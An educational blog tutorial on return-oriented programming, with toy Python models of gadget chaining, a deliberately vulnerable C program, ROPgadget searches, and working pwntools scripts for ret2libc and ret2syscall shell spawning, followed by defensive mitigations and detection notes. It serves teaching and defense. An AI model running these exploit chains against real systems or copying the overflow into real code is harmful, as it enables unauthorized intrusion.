Return-Oriented Programming (ROP) Fundamentals: From Gadgets to ret2syscall

Disclaimer: This article is for education and authorized security testing only. Run every command against binaries you own or have explicit written permission to test (your own lab, CTF targets, or scoped engagements). Unauthorized exploitation of software is illegal in most jurisdictions.

Table of contents

Introduction / Overview
How it works / Background
Prerequisites / Lab setup
Walkthrough / PoC
Mermaid diagram
Detection & Defense (Blue Team)
Conclusion
References

Introduction / Overview

Return-Oriented Programming (ROP) is the canonical technique for defeating a non-executable stack (NX/DEP). When the stack is marked non-executable you can no longer drop shellcode onto it and jump to it. Instead, ROP reuses code that is already executable — small instruction sequences ending in ret called gadgets — and chains them together by controlling the saved return addresses on the stack. The CPU executes one gadget, hits ret, pops the next address you placed, and continues. The "program" you are running is a list of addresses, not bytes of your own code.

This post walks through the building blocks every exploit developer needs: finding gadgets with ROPgadget, the two classic payload shapes (ret2libc and ret2syscall), and the stack pivot trick for when buffer space is tight. If you are new to memory corruption, the stack buffer overflow primer covers the prerequisite control-flow hijack.

How it works / Background

A gadget is a short sequence such as pop rdi ; ret. The trailing ret is what makes chaining possible: it pops the next 8 bytes (on x86-64) off the stack into RIP. By laying out values and gadget addresses carefully, you load registers, perform arithmetic, and ultimately invoke a function or a syscall.
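
To make the chaining mechanics concrete, here is a toy model in plain Python. It does not execute machine code; it only mimics the stack discipline described above, where each ret pops the next address and each gadget may pop its own operands. The gadget addresses (0x1000, 0x2000, 0x3000) and the three-register machine are invented for illustration.

```python
# Toy model of ret-chaining: no real machine code, just the stack discipline.
# Gadget addresses (0x1000, 0x2000, 0x3000) are made up for illustration.

def run_chain(stack, gadgets, max_steps=32):
    """Emulate `ret` repeatedly: pop an address, run that gadget, repeat."""
    regs = {"rdi": 0, "rsi": 0, "rax": 0}
    sp = 0  # index of the next stack slot, standing in for RSP
    trace = []

    def pop():
        nonlocal sp
        value = stack[sp]
        sp += 1
        return value

    for _ in range(max_steps):
        if sp >= len(stack):
            break                      # chain exhausted
        addr = pop()                   # what `ret` does: next slot -> RIP
        name, effect = gadgets[addr]
        trace.append(name)
        effect(regs, pop)              # the gadget body may pop operands
    return regs, trace


GADGETS = {
    0x1000: ("pop rdi ; ret", lambda r, pop: r.update(rdi=pop())),
    0x2000: ("pop rsi ; ret", lambda r, pop: r.update(rsi=pop())),
    0x3000: ("add rax, rdi ; ret",
             lambda r, pop: r.update(rax=r["rax"] + r["rdi"])),
}

# The "program": addresses interleaved with the data each gadget pops.
STACK = [0x1000, 41, 0x3000, 0x1000, 1, 0x3000, 0x2000, 7]

regs, trace = run_chain(STACK, GADGETS)
print(regs)    # {'rdi': 1, 'rsi': 7, 'rax': 42}
print(trace)
```

Nothing in STACK is code. The computation (41 + 1 in RAX) comes entirely from the order of addresses and operands, which is the sense in which a ROP chain is a program.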

Two payload styles dominate:

ret2libc — instead of injecting code, you redirect execution into an existing libc function such as system("/bin/sh"). You only need gadgets to set up arguments per the calling convention.
ret2syscall — you build a syscall invocation directly (e.g. execve("/bin/sh", NULL, NULL)), useful for statically linked binaries with no libc imports.

A stack pivot moves RSP to memory you control (a .bss buffer, a heap chunk, or a known data region) when the overflowed stack is too small to hold the full chain. Gadgets like xchg rsp, rax ; ret or leave ; ret accomplish this.

On x86-64 System V, the first six integer or pointer arguments go in RDI, RSI, RDX, RCX, R8, R9, in that order. So a system("/bin/sh") call needs the address of the string in RDI, hence the ubiquitous hunt for pop rdi ; ret.
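
The register assignment is mechanical enough to write down as a small helper. The sketch below maps an argument list onto registers for an ordinary function call and, for comparison, for a raw Linux x86-64 syscall, where R10 takes the place of RCX and the syscall number goes in RAX. The helper name assign_registers and the BINSH address are hypothetical.

```python
# System V AMD64 function-call order vs. the Linux x86-64 syscall order.
# In the six register slots the only difference is RCX (calls) vs. R10 (syscalls).
CALL_REGS    = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]
SYSCALL_REGS = ["rdi", "rsi", "rdx", "r10", "r8", "r9"]


def assign_registers(args, syscall_nr=None):
    """Map integer/pointer arguments onto registers.

    With syscall_nr set, use the syscall order and put the number in RAX.
    """
    order = CALL_REGS if syscall_nr is None else SYSCALL_REGS
    if len(args) > len(order):
        raise ValueError("only the six register slots are modeled here")
    regs = dict(zip(order, args))
    if syscall_nr is not None:
        regs["rax"] = syscall_nr
    return regs


BINSH = 0x404800  # hypothetical address of a "/bin/sh" string

print(assign_registers([BINSH]))                       # system("/bin/sh")
print(assign_registers([BINSH, 0, 0], syscall_nr=59))  # execve("/bin/sh", 0, 0)
```

Each key in the returned dictionary is a register you need a loader gadget for, which gives you the shopping list before you start searching the binary.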

Prerequisites / Lab setup

Use an isolated Linux VM. Install the tooling:

sudo apt update
sudo apt install -y python3-pip gdb git
pip3 install pwntools ROPgadget   # ROPgadget is a PyPI package; pwntools also ships a checksec command
# pwndbg makes gdb far more usable for pwn work
git clone https://github.com/pwndbg/pwndbg && cd pwndbg && ./setup.sh

A deliberately vulnerable target compiled with NX on (the default) but with no stack canary and no PIE, so the binary's own addresses stay fixed (libc is still randomized unless ASLR is disabled):

cat > vuln.c <<'EOF'
#include <stdio.h>
#include <unistd.h>   /* declares read() */
void vuln(){ char buf[64]; read(0, buf, 256); }
int main(){ vuln(); return 0; }
EOF
gcc -fno-stack-protector -no-pie -o vuln vuln.c
checksec --file=./vuln    # expect NX enabled, PIE disabled

Walkthrough / PoC

1. Find gadgets with ROPgadget

ROPgadget --binary ./vuln | head
# Hunt for the argument-setup gadget
ROPgadget --binary ./vuln | grep -E ": pop rdi ; ret"
# Check whether the binary already contains a "/bin/sh" string
ROPgadget --binary ./vuln --string "/bin/sh"

For a statically linked binary you will also want syscall and the register loaders:

ROPgadget --binary ./vuln --only "pop|ret"
ROPgadget --binary ./vuln | grep -E ": syscall"
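
If you would rather post-process the listing than grep it, the output is easy to parse: each gadget line has the form "address : instructions". The helper below is a minimal sketch that turns such text into a lookup table. The parse_gadgets name is hypothetical and the sample addresses are made up; only the line shape is taken from ROPgadget.

```python
import re

# ROPgadget prints one gadget per line as "<hex address> : <insn> ; <insn> ...".
LINE_RE = re.compile(r"^(0x[0-9a-fA-F]+) : (.+)$")


def parse_gadgets(text):
    """Return {instruction string: lowest address} from ROPgadget-style output."""
    found = {}
    for line in text.splitlines():
        match = LINE_RE.match(line.strip())
        if not match:
            continue                      # banner, separator, or summary line
        addr, insns = int(match.group(1), 16), match.group(2).strip()
        if insns not in found or addr < found[insns]:
            found[insns] = addr
    return found


# Sample text with made-up addresses, shaped like ROPgadget output.
SAMPLE = """\
Gadgets information
============================================================
0x000000000040101a : ret
0x00000000004011d3 : pop rdi ; ret
0x00000000004011d1 : pop rsi ; pop r15 ; ret

Unique gadgets found: 3
"""

gadgets = parse_gadgets(SAMPLE)
print(hex(gadgets["pop rdi ; ret"]))   # 0x4011d3
```

In a lab you would redirect the real listing to a file (ROPgadget --binary ./vuln > gadgets.txt) and pass its contents to the same function.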

2. ret2libc with pwntools

When libc is present and you can leak its base (or run locally with ASLR off), call system("/bin/sh"). The skeleton below uses pwntools to resolve symbols and assemble the chain:

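from pwn import *

# context.binary sets arch to amd64, so flat() packs 8-byte little-endian words
context.binary = elf = ELF('./vuln')

# Offset to saved RIP: 64-byte buf + 8-byte saved RBP (confirm with cyclic in gdb)
OFFSET = 72

p = process('./vuln')

# Local-lab shortcut: p.libc returns the mapped libc as an ELF with its base
# address already applied. Against a real target you would leak an address
# and set libc.address yourself.
libc = p.libc

# Small binaries linked against recent glibc often contain no pop rdi ; ret,
# so search libc as well now that its base is known.
rop      = ROP([elf, libc])
pop_rdi  = rop.find_gadget(['pop rdi', 'ret'])[0]
ret      = rop.find_gadget(['ret'])[0]   # 16-byte stack alignment for movaps
binsh    = next(libc.search(b'/bin/sh\x00'))
system   = libc.sym['system']

payload  = flat({
    OFFSET: [
        ret,        # align RSP to 16 bytes before the call
        pop_rdi, binsh,
        system,
    ]
})

p.send(payload)
p.interactive()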

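The lone ret before system fixes a real-world footgun. The System V ABI expects RSP to be 16-byte aligned at every call site, and recent glibc builds rely on that inside system() by using movaps on stack memory, which faults on a misaligned address. One extra ret shifts RSP by 8 bytes and restores the expected alignment, so the call does not SIGSEGV.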
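
Whether the padding ret is needed follows from simple arithmetic on slot positions, sketched below. The assumption is that vuln() was entered through a normal call, so the slot holding its saved return address sits at an address that is 8 modulo 16. The concrete address SAVED_RIP is hypothetical.

```python
def rsp_at_entry(saved_rip_slot, index_in_chain):
    """RSP right after the `ret` that transfers control to chain[index_in_chain].

    Each chain entry occupies one 8-byte slot, and `ret` leaves RSP just past
    the slot it consumed.
    """
    return saved_rip_slot + 8 * (index_in_chain + 1)


def abi_aligned(rsp):
    """True when RSP looks as it would after a normal `call` (RSP % 16 == 8)."""
    return rsp % 16 == 8


# Hypothetical stack address of vuln()'s saved return address. Because vuln()
# was itself entered through a `call`, that slot is at an address % 16 == 8.
SAVED_RIP = 0x7FFFFFFFE018

no_pad   = ["pop_rdi", "binsh", "system"]
with_pad = ["ret", "pop_rdi", "binsh", "system"]

for chain in (no_pad, with_pad):
    rsp = rsp_at_entry(SAVED_RIP, chain.index("system"))
    print(len(chain), hex(rsp), abi_aligned(rsp))
# 3 0x7fffffffe030 False
# 4 0x7fffffffe038 True
```

An odd number of 8-byte slots before system leaves the stack misaligned on entry, and an even number fixes it. The same check tells you when a longer chain does not need the padding at all.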

3. ret2syscall (static binary, no libc)

Here we synthesize execve("/bin/sh", 0, 0), which is syscall number 59 on x86-64:

from pwn import *

# context.binary sets arch to amd64, so flat() packs 8-byte little-endian words
context.binary = elf = ELF('./vuln_static')
rop = ROP(elf)

pop_rax = rop.find_gadget(['pop rax', 'ret'])[0]
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
pop_rsi = rop.find_gadget(['pop rsi', 'ret'])[0]
pop_rdx = rop.find_gadget(['pop rdx', 'ret'])[0]
syscall = rop.find_gadget(['syscall'])[0]
binsh   = next(elf.search(b'/bin/sh\x00'))   # or write it yourself into .bss

chain = flat({72: [
    pop_rdi, binsh,
    pop_rsi, 0,
    pop_rdx, 0,
    pop_rax, 59,        # __NR_execve
    syscall,
]})

p = process('./vuln_static')
p.send(chain)
p.interactive()
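
It can help to see the same chain without pwntools, both to demystify what flat() produces and to check that the payload fits the overflow. The sketch below packs the execve chain with struct and compares its size against the 256 bytes that vuln() reads. All gadget and string addresses are placeholders invented for this example.

```python
import struct

OFFSET   = 72    # padding up to the saved return address, as in the script above
READ_MAX = 256   # vuln() calls read(0, buf, 256)

# Placeholder gadget and string addresses, invented for this sketch.
POP_RDI, POP_RSI, POP_RDX, POP_RAX = 0x401F0F, 0x409F1E, 0x47F2CB, 0x44FD07
SYSCALL, BINSH = 0x401CD4, 0x4C5000


def pack_chain(words, offset=OFFSET):
    """Pad to the saved return address, then append each word as little-endian u64."""
    return b"A" * offset + b"".join(struct.pack("<Q", w) for w in words)


payload = pack_chain([
    POP_RDI, BINSH,   # rdi = pathname
    POP_RSI, 0,       # rsi = argv (NULL)
    POP_RDX, 0,       # rdx = envp (NULL)
    POP_RAX, 59,      # rax = __NR_execve
    SYSCALL,
])

print(len(payload), len(payload) <= READ_MAX)   # 144 True
```

Nine 8-byte words plus 72 bytes of padding come to 144 bytes, comfortably inside the read. When that comparison fails, the chain has to be staged somewhere else.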

4. Stack pivot when space is tight

If the overflow only gives you a handful of bytes past RIP, stage the real chain elsewhere and pivot. A common pattern reads the full chain into .bss, then pivots RSP there:

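bss       = elf.bss(0x200)                         # staging area 0x200 bytes into .bss
leave_ret = rop.find_gadget(['leave', 'ret'])[0]   # mov rsp, rbp ; pop rbp ; ret
# Stage 1: overwrite saved RBP with bss - 8, return into a read() that fills bss,
# then return into leave ; ret so RSP lands on the staged chain at bss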

leave ; ret is equivalent to mov rsp, rbp ; pop rbp ; ret, so controlling the saved RBP lets you redirect RSP to your staged buffer. Other pivots include xchg rsp, rax ; ret and add rsp, 0x?? ; ret.
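
The bss - 8 detail is easiest to verify by stepping through the instruction pair by hand. The sketch below applies leave ; ret to a toy register file and a dictionary standing in for memory. BSS, FIRST_GADGET, and the initial RSP are hypothetical values.

```python
def leave_ret(mem, regs):
    """Apply `leave ; ret` to a toy machine (mem maps address -> 8-byte value)."""
    regs["rsp"] = regs["rbp"]          # leave, part 1: mov rsp, rbp
    regs["rbp"] = mem[regs["rsp"]]     # leave, part 2: pop rbp
    regs["rsp"] += 8
    regs["rip"] = mem[regs["rsp"]]     # ret: pop rip
    regs["rsp"] += 8
    return regs


BSS = 0x404800             # hypothetical staging address in .bss
FIRST_GADGET = 0x4011D3    # hypothetical first gadget of the staged chain

mem = {
    BSS - 8: 0xDEADBEEF,   # consumed by pop rbp (becomes the new RBP)
    BSS:     FIRST_GADGET, # consumed by ret (becomes RIP)
    BSS + 8: 0x1337,       # first operand of the staged chain
}

# The overflow planted BSS - 8 in the saved-RBP slot, so RBP holds that value
# by the time the leave ; ret gadget runs.
regs = leave_ret(mem, {"rsp": 0x7FFFFFFFE020, "rbp": BSS - 8, "rip": 0})
print({name: hex(value) for name, value in regs.items()})
# {'rsp': '0x404808', 'rbp': '0xdeadbeef', 'rip': '0x4011d3'}
```

RSP ends up one slot past the first staged gadget, which is where that gadget expects to find its operand. Pointing RBP at bss itself would instead waste the first chain entry on pop rbp.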

Mermaid diagram

[Diagram 1: ROP decision flow (image not reproduced)]

The diagram shows the decision flow from a hijacked return address to choosing ret2libc, ret2syscall, or a stack pivot depending on NX, libc availability, and buffer size.

Detection & Defense (Blue Team)

ROP exploits a gap left open when only the stack is non-executable. Layered defenses raise the cost sharply:

ASLR / PIE. Randomizing the base of libc, the heap, and the binary itself forces the attacker to leak addresses first. Always compile with -fPIE -pie and confirm system-wide ASLR: cat /proc/sys/kernel/randomize_va_space should be 2. PIE turns fixed pop rdi addresses into a leak-and-compute problem.
Stack canaries. -fstack-protector-strong (default on most distros) places a guard value before the saved return address; a linear overflow corrupts it and __stack_chk_fail aborts. This blocks the simplest path to RIP.
Full RELRO. -Wl,-z,relro,-z,now makes the GOT read-only, removing a popular write-what-where target used to bootstrap chains.
Control-Flow Integrity (CFI). Intel CET Shadow Stack keeps a protected copy of return addresses; a mismatch on ret faults, which directly breaks ROP's core mechanism. ARM offers Pointer Authentication (PAC) and BTI. Compile with -fcf-protection=full on supported toolchains.
Compiler hardening & FORTIFY. Build with -D_FORTIFY_SOURCE=3 -O2 to catch unsafe read/memcpy/strcpy patterns at runtime.
Detection. Map findings to MITRE ATT&CK T1055 (Process Injection) and T1203 (Exploitation for Client Execution). EDR/telemetry that flags execve of a shell from an unexpected parent, unusual mprotect calls flipping pages to RWX, or anomalous control flow (via ETW/hardware tracing) can surface ROP activity. Stack-pivot detection looks for RSP pointing outside the legitimate stack region at syscall entry.
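
As a rough illustration of the stack-pivot check mentioned above, the sketch below compares a captured RSP value against the [stack] mapping in /proc/<pid>/maps-style text. It is a simplified heuristic, not a description of how any particular EDR product works: it only knows about the main thread's stack, and the maps excerpt and RSP values are made up.

```python
def stack_range(maps_text):
    """Return (start, end) of the [stack] mapping from /proc/<pid>/maps text."""
    for line in maps_text.splitlines():
        fields = line.split()
        if fields and fields[-1] == "[stack]":
            start, end = (int(part, 16) for part in fields[0].split("-"))
            return start, end
    raise ValueError("no [stack] mapping found")


def looks_pivoted(rsp, maps_text):
    """True when RSP lies outside the main thread's stack mapping."""
    start, end = stack_range(maps_text)
    return not (start <= rsp < end)


# Trimmed, made-up maps excerpt in the kernel's format.
MAPS = """\
00404000-00405000 rw-p 00003000 08:01 1311 /home/lab/vuln
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack]
"""

print(looks_pivoted(0x7FFFFFFFE038, MAPS))  # False: ordinary stack address
print(looks_pivoted(0x404808, MAPS))        # True: RSP inside the binary's data segment
```

A production check would also need to account for thread stacks, alternate signal stacks, and runtimes that legitimately switch stacks, all of which fall outside the [stack] mapping.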

For triage of a suspicious binary before any of this, see the Ghidra getting-started guide and the checksec hardening checklist.

Conclusion

ROP turns a binary's own bytes into an interpreter for attacker-supplied address lists. The fundamentals — locating gadgets with ROPgadget, staging arguments per the calling convention, choosing ret2libc versus ret2syscall, and pivoting when space runs out — compose into nearly every modern userland exploit. The same understanding tells defenders exactly which mitigation breaks the chain: canaries protect the return address, ASLR/PIE hides the gadgets, RELRO closes the GOT, and CET shadow stacks invalidate the ret primitive itself. Defense-in-depth is what makes ROP expensive.

References

MITRE ATT&CK — Exploitation for Client Execution (T1203): https://attack.mitre.org/techniques/T1203/
MITRE ATT&CK — Process Injection (T1055): https://attack.mitre.org/techniques/T1055/
HackTricks — ROP / Stack Pivoting: https://book.hacktricks.xyz/binary-exploitation/rop-return-oriented-programing
ROPgadget: https://github.com/JonathanSalwan/ROPgadget
pwntools documentation: https://docs.pwntools.com/
Intel CET (Control-flow Enforcement Technology) overview: https://www.intel.com/content/www/us/en/developer/articles/technical/technical-look-control-flow-enforcement-technology.html
Shacham, "The Geometry of Innocent Flesh on the Bone" (original ROP paper): https://hovav.net/ucsd/papers/s07.html
